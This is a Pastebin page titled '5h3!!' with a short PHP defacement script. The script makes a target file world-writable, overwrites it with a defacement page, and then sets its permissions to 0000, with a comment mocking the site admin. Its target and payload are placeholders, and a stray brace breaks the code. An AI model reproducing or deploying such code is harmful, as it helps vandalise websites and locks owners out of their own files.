Advertisement
hasib_mo

5h3!!

Mar 8th, 2012
58
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.25 KB | None | 0 0
  1. <?php
  2. $link="/*some link*/";
  3. chmod($link,0777); //change permission first
  4.  
  5. $deface_page=' '; //include the html deface page i like
  6.  
  7. $file=fopen($link,"w+");
  8. fwrite($file,$deface_page);
  9. fclose($file);
  10. chmod($link,0000);
  11. //kidding to admin :p
  12.  
  13. }
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement